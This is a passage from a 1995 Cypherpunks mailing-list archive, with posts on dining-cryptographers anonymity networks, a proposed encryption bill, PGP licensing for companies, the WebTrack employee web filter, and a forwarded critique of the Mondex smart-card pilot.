all members of the DC-net you could XOR them and see who's >talking to who. Presumably people will use multiple key-ids on the net as well - Alice may have a general-use "Alice" key, and maybe also a general-use "Medusa" key, but Alice or Medusa may have also arranged with Bob to use a different key for traffic where he doesn't mind if she knows he sent it and he doesn't want anyone else knowing it's being sent to her. Also, he can do this anonymously, so she doesn't know either: Alice posts Plaintext("Hi, I'm Alice, key AAAA") Bob posts Encrypt(AAAA, "Hi, Alice, I'm Dr. X, Key XXXX, please post a key I can use to talk to you") Alice posts Encrypt(XXXX, Signed(AAAA, "Hi, Dr. X, use key AXAX")) Bob's message lets him send stuff to Alice without anyone, including her, knowing it's from him, since the name X and key XXXX are new randoms. Alice signs her response so Dr. X knows that key AXAX will really go to Alice and not to Mallet who's impersonating Alice; she doesn't really care who X is. If traffic analysis is a concern (Alice noticing, for instance, that she's getting a _lot_ of requests from key AXAX for her remailer to send stuff to destination ZZZZ), Bob can keep sending her new requests for keys and ids, and not reuse them more than he thinks is safe. >I'd have thought the most significant problem would be reserving the >blocks in an anonymous fashion while not allowing denial-of-service >attacks. Since anybody can send bits at any time, and nobody can tell who without lots of collusion, you can't prevent denial-of-service (well, I assume not, unless there's something rather non-obvious in the literature.) The Bad Guy can decide if it's more fun to jam the reservations or the messages. What reservation does for you is gives a short inefficient period (with possible collisions, backoff-and-retry, etc., depending on algorithm) that you can use to reserve a longer one-user period for message traffic, so you can spend most of your time talking instead of haggling over interruptions. One way to do reservations is to use some variant on Slotted Aloha for the reservation period - for example, everybody picks a random id number for the session, (with odd parity or odd high-bit to make collision detection easier), waits a random number of slots, and then sends their id number. If there's a collision, wait and retry, maybe with exponential backoff. After the first slot that's got data and looks like it doesn't have a collision, anybody who thinks that it was their number picks a different number, waits a short random number of slots and posts; first one wins. (If you're using 32-bit randoms and have fewer than a million players, the chances of two undetected collisions in a row are really small, even if people cheat a bit on their backoffs.) Winner announces how many slots he's going to use up for his message, so you know when to start again. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:51:25 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:25 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <199507180649.XAA25423@ix3.ix.netcom.com> At 06:06 PM 7/17/95 +0200, Hadmut Danisch wrote: >1. If the bill becomes law, how can someone who violates it be >punished? Only by violating the Constitution and basic common sense, but that doesn't usually bother the Government very much... >2. Does someone who publishes software which encodes or encrypts >(ASCII is a code, isn't it?) have to prove that he has provided the >universal decoder to the state or does the state have to prove that he >didn't do? It's not defined in the law, and if the good Senator writes stupid offensive laws which are so stupid that they have big holes in them like this, I don't intend to correct him :-) >In the former case, does he get any receipt from the department of >justice and what does the receipt say (1.3MByte of software >received...)? Nobody knows. >In the latter case, how do they want to prove he didn't? If he gave >just a big > for(i=0;;i++) try_key(i); >how do they want to prove this doesn't work? [... halting problem...] The proposed law doesn't say that the mechanism has to decrypt the message in a short period of time. If the law passes, I'll be happy to help write the PGP Universal Decoder program for anybody who needs it to take to court. Some kinds of program are affected by the Halting Problem; other kinds are easy to show that they halt. For the PGP Universal Decoder, trial division can find the factors for an N-bit key in much less than 2**N tries, if you program it well, and you know it will halt by then, if the Universe hasn't decayed first. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:51:46 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:46 PDT Subject: Root Causes Roots Message-ID: <199507180649.XAA25403@ix3.ix.netcom.com> At 02:08 PM 7/17/95 -0400, Jim Ray wrote: [ Crypto timeline and discussion omitted ] >Careful thought reveals a atrong suspicion that the "3/5ths people" >[slaves] had more use for crypto at the time than free white males >did, but I doubt much, if any, evidence of that activity was >preserved, and I'm sure it was _forcefully_ discouraged if ever >discovered...My point is, slaves, or those who live in fear of >eventual slavery, for whatever reason, have a strong affinity for >cryptography. Note, for example, early use [mentioned in the timeline >above] by the Jewish people. Or, more precisely, they have a strong affinity for private in-group communications. Cryptography's a bit tough in an environment where it was often illegal to teach slaves to read. On the other hand, oral cultures are often good at using metaphor and in-jokes and shared knowledge to express things that the speaker doesn't want the oppressive group to understand. I've seen commentaries talking about that in North American black culture, and there are other examples like Cockney rhyming slang. And then, of course, there are totally incomprehensible communication systems like Gaelic :-), which the Brits tried hard to stamp out. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:51:54 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:51:54 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <199507180649.XAA25411@ix3.ix.netcom.com> At 09:07 PM 7/17/95 -0400, tim werner wrote: >>... I was talking to one of the sys admins at >>A-B, and he said that we weren't allowed to use PGP to encrypt our mail, >>because Viacrypt owned the commercial rights. Actually, it's less clear than that. It's pretty clear what you can do with ViaCrypt code; just read the license to see who can use it, and you can send any kind of messages you want over it, even for money. On the other hand, the definitions of "non-commercial use" for RSAREF and IDEA are far less clear (and they're clearer for RSAREF than for IDEA, and I got the impression from what I read somewhere on the net or in the PGP docs that the initial permission from Ascom-Tech for use of IDEA with PGP was pretty informal, and that they've been trying to tighten up what's covered.) (Also RSAREF licenses have changed from version to version, and the license PKP uses to distribute versions of RSAREF may also have changed?) Selling software containing the code is pretty clearly commercial. Non-commercial messages from your personal non-business machine are clearly non-commercial. Providing a service of encrypting and decrypting messages for people for money sounds like it's _very_ probably commercial. Encrypting and decrypting messages to/from your business that deal with money are a very gray area. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Mon Jul 17 23:52:17 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 17 Jul 95 23:52:17 PDT Subject: bi-directional dining cryptographers Message-ID: <199507180649.XAA25432@ix3.ix.netcom.com> At 12:24 PM 7/17/95 -0500, Phil Fraering wrote: >I'd also like to point out that this system indicates that during >an attack/disruption on a traditional dc-net, the disruptor can >tell what the original person was trying to send, even though noone >else can. > >And then perhaps XOR the data with something offensive, and if the >original sender tries to re-send, broadcast the result of the XOR, >resulting in a total net output of the offensive material. That's difficult - you have to identify that the sender is sending the same message while the message is being sent, rather than one or two bit-times later, and you can't fake encryption with an unknown keyid or digital signatures. (Digital signatures aren't something everybody would use very often on a DC-net, since the purpose of the net is to be anonymous, but since you can do anonymous broadcasts, you can anonymously post a signature key for your nym if you want to.) Also, there's no need to combine jamming and posting an offensive message; they both work well separately. I suppose you could do that if you only want to harass the net a bit (e.g. replace all trafic to remailer X with new remail to whitehouse.gov, or replace all postings from Cancelmoose with complaints about censorship), but basically DCnets degrade rapidly if the social structure of the net members does. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From greg at ideath.goldenbear.com Tue Jul 18 00:17:26 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Tue, 18 Jul 95 00:17:26 PDT Subject: SurfWatch for employees (ugh) Message-ID: <199507180636.AA02056@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Consistent with the trend towards treating employees like children, Webster Network Strategies has announced (but apparently has not shipped) a product similar to SurfWatch but aimed at an employment environment. The product is called "WebTrack" and supposedly supports access lists of URLs, where access can be allowed to "all but these sites" or "only to these sites". The product also can be configured to log all Web usage by users subjected to its reign of terror. :) WebTrack is priced at $7,500 with an annual subscription to its list of interesting (err, forbidden) sites priced at $1,500. The article in the 7/10/95 Infoworld doesn't list contact information for Webster Network Strategies. What is it, two months between deployment of software designed to restrict net access to one segment of the population perceived as especially vulnerable and the subsequent application of that technology to other target groups? My bet is the next target group will be university students, followed by "affinity marketing" with various repressive organizations (whose names I elide in the interests of greater Cypherpunk harmony, pick your own and imagine them here.) Of course, the next step is to use restrictive licensing/distribution terms (a la Netscape/Mozilla) and a nifty freeware/software package available only from a site which also carries porn (or other forbidden fruit) to make the customers/purveyors of this crap twist in the wind a bit. Break the terms of the license and get the software somewhere else? Avoid using the coolest new thing because you're hooked up via we'll-think-for-you.net? Doh. (Pedants need not point out that personal choice (and personal filtering) are always appropriate, and indeed empowering. Neither WebTrack nor NetSurf are marketed to help people subject themselves to a regime of repression - they are intended and sold to allow the purchaser to control what others (perceived as having fewer or no rights) will read and view. ". . inasmuch as you have done it unto one of the least of these my brethren, ye have done it unto me." Matthew 25:45) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAtWUn3YhjZY3fMNAQH8EAP/aFXe7uI1EuIB31L8h7H+5l3Mg1aQE7e9 i86FnqwGMDg5JlDvJD05dXOBXeInvKtc6ZD0Us+qwDmg2ISo/Yu0QCfedTBgZ7fq s/3WFwtOcpiBG7YTkxGJrvB+r4KIgodb9QSGEQ8yofKaRLT33IkgO3ijxrnyoNkX vm/tZ8EnoV0= =hrOo -----END PGP SIGNATURE----- From an250888 at anon.penet.fi Tue Jul 18 02:14:42 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Tue, 18 Jul 95 02:14:42 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up Message-ID: <9507180840.AA14290@anon.penet.fi> >> >and, conspiracy theories non-withstanding, we the people do not govern >> >America --we are only given a short list of politicians who have sold >> >their soul to CFR's satanist inner circle. >> >> What's CFR? >> > >Council on Foreign Relations. or Code of Federal Regulations. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From habs at warwick.com Tue Jul 18 06:12:25 1995 From: habs at warwick.com (Harry S. Hawk) Date: Tue, 18 Jul 95 06:12:25 PDT Subject: SurfWatch for employees (ugh) In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com> Message-ID: <199507181311.JAA06412@cmyk.warwick.com> I don't think there is ever anything wrong with employeer's restricting what employee's do on any legal or ethical level. Evolution (a la Bionomics) will sort out the winners and losers. /hawk > or "only to these sites". The product also can be configured to log all > Web usage by users subjected to its reign of terror. :) WebTrack > are always appropriate, and indeed empowering. Neither WebTrack nor From lmccarth at cs.umass.edu Tue Jul 18 06:46:32 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 18 Jul 95 06:46:32 PDT Subject: WebTrack URL/Contact Info Message-ID: <9507181346.AA21915@cs.umass.edu> The WWW site for Webster Network Strategies and its WebTrack software is http://www.webster.com/ According to that page: How to reach us: E-mail info at webster.com Call (941) 261-5503 Fax (941) 261-6549 Write to WNS, 1100 5th Avenue South, Suite 308, Naples, FL 33940 From jgrubs at voxbox.norden1.com Tue Jul 18 06:54:01 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 18 Jul 95 06:54:01 PDT Subject: SurfWatch for employees (ugh) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Greg Broiles writes: > Consistent with the trend towards treating employees like children, > Webster Network Strategies has announced (but apparently has not > shipped) a product similar to SurfWatch but aimed at an employment > environment. The product is called "WebTrack" and supposedly supports Forcing workers to keep their minds on their work? Shameful... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAu7mN74r4kaz3mVAQEWhgP9FDkAtsbPMVk5/FTCGaImFu7Iqllw0Y55 Rv2gXxVdiYKmK449i1+PQhJvpnLJE5qVRqMeCjhcysrbI/WK9RUDP+6FVenfDjWZ Kxh385qzNWE1sJTv92ii3g4dbIp7yziePJc9ZH6HqZ9i1MAyQfjEPutNcE5xgLSH hBUYN0Q1cPE= =l0BB -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From jgrubs at voxbox.norden1.com Tue Jul 18 06:54:02 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 18 Jul 95 06:54:02 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <5ZsF9c6w165w@voxbox.norden1.com> -----BEGIN PGP SIGNED MESSAGE----- jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) writes: > As I recall, the following is a correct scenario: a customer can use PGP to > send credit card numbers to a vendor he's making a personal purchase from, > but the vendor must use Viacrypt. If the customer is buying something to use > for business, BOTH must use Viacrypt. In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAu5iN74r4kaz3mVAQF11QQAiNccy69sb5OA1jmOpErqqZNJ4sNx3smW tAJQ3lD1op4qlPIO48vxwkvr+IaQyyOkf797+9Ca1z9WtxgwSamo32BQnPQZ6Pbm Vipmpwrabrxq67TOrGgxNp3UN7oBZl3eyad0hIj6ENzs8u1wi3wkHUV/3z341XB7 u953orkOZSk= =UYrt -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From mark at unicorn.com Tue Jul 18 07:06:32 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Tue, 18 Jul 95 07:06:32 PDT Subject: Mondex (forward) Message-ID: Thought this might be of interest... forwarded with permission.. >From Andy Meredith (meredith at bcs.org.uk) on the ecm list : On Jul 18, 9:21am, Marcel van der Peijl wrote: > Subject: Re: e$, c$$$, Cyberbucks & ECash - terminology. > > > electronic cash (also digital cash) is a general term for > > > the concept of encrypted messages that have inherent value > > > - as opposed to credit notes or electronic checks. I guess > > > that the Mondex smart cards have ecash in them, but that > > > seems different. > > I am such a bad reader! You are right. This is a good definition > of electronic cash or digital cash. Mondex is questionable. The > card has an account, and uses crypto to proof it is a real Mondex > card, so you'd better believe it when it says it took the money > of it's internal balance. I would vote this is not digital cash. I am participating in the Mondex pilot scheme in Swindon. It took me a great deal of pushing to get _any_ details at all. The details I did get didn't go into the encryption schemes used or any such fun stuff. It did in fact take quite a while for me to realise the significant differences between ecash and Mondex. As they didn't, in the end, make me sign an NDA, I guess I can share. 1 - The Value is not encrypted on the card, that is held as plain text, it is the front door on the card that is heavily guarded. If therefore you can inject value into the card from the back door, it is then taken as real money. The logic being; Hey it managed to get through all that security which is imposible for anything except another mondex card to do, it must therefore be Mondex money ... that's Ok then. There can never be a software only version of Mondex as it stands. The trust is in the front door, not the cash values themselves. 2 - Some of their transaction monitoring is very "Big Brother"esque. As you can imagine, if a card is seen to be creating money but not consuming it, there IS a problem. Therefore whenever you get some money from a "hole in the wall", the bank sucks over your transaction log & error log. It will of course only ever use this for security monitoring. It will never follow the likes of AMEX and start stock pilling these transactions, using it's knowledge of the which physical entity own what card ID, and using the cross reference for market research/direct mail/consumer profiling. No of course not. That would be TOTALLY unethical ... 3 - Mondex is billed as "Electronic Cash", but you won't find the concept of anonymity in there anywhere. They talk about it, but I haven't seen them write it down explicitly. One could suggest however that that "Cash == Anonymous", so the scheme would have to be anonymous for them to have a right to the "Electronic Cash" title. > So what is the name for schemes like this? How about "Stored Value Card" >-- End of excerpt from Marcel van der Peijl One interesting thing that I noted. When I read through the technical blerb on ecash a while back, I had to sit back and think very clearly, and read very slowly. However, it was relatively easy to understand the bits, and then even easier to put the bits together into a system. The reason, I suggest, is that if you understood all the encryption technology behind ecash, and had the requirements that it has for anonymity and security (hand in hand). You would reinvent ecash. Maybe the layering would be subtly different, the real one ond your independant derivative wouldn't interact, but ... If however you were to have asked me to explain ecash a week later, I would have been totally stumped. It is a very elegant system. Mondex, on the other hand, worried from the word go. It just didn't seem to add up. Apart from everything else, why were they being so damned secretive. I read and thought, and read and thought. Then it finally dawned on me. Mondex just simply doesn't have the same requirements list as ecash. I was prejudging the requirements from my previous exposure to ecash. Ask me to explain Mondex to you now ... what do you want to know :) Andy M (this is my opinion of information gained outside of company time. It is not the opinion my employer.) And : On Jul 18, 12:29pm, Marcel van der Peijl wrote: > Subject: Re: Mondex > > I am participating in the Mondex pilot scheme in Swindon. It > > took me a great deal of pushing to get _any_ details at all. > > Of course! Security through obscurity has always been a good way of > protecting your systems... ;) Absolutely. That's why VISA have lost so little money :) > > 3 - Mondex is billed as "Electronic Cash", but you won't find the > > concept of anonymity in there anywhere. They talk about it, > > but I haven't seen them write it down explicitly. > > Hahahaha. Let me explain. You can buy the card anonymously. This > gives anonimity.... > NOT! Actually, you can't. You need to supply bank details in order to get one. At least you do for the Swindon trial. The cards in use here are in fact combined ATM and Stored Value ;) cards. They have all your bank details in a mag. stripe on the back of the card. The current batch of EPOS terminals don't use this stripe, but I wait with interest. > They are forgetting that tracebility plus one link of a person to an > 'anonymous' account is the same as identification. Sainsbury's (et al) sussed that one a while back. Hence the introduction of "Customer Loyalty Cards" (yuch!!). Thereby allowing them to bind purchases/times/locations => Credit card numbers => Physical customer addresses & therefore demographic data. Only in this situation for Credit card number read Mondex card ID. > Do you realise any ATM, and a lot of stores, have security camera's > embedded? No, they wouldn't use that to link a person to a card, > would they? That would be unethical... No need. They have not only formed the link, but they are getting you to fill in the damned form :) > > How about "Stored Value Card" > For Mondex, perfect. What about FV? And NetChex? Don't know about these ones. > About your perception of ecash: I admit that the blurp on our server > does not fully cover the system in such a way it is easy to remember > and explain. Not at all. If you had asked me to explain the system while it was still fresh in my mind, I would have had no trouble. It is very neat and logical, but it i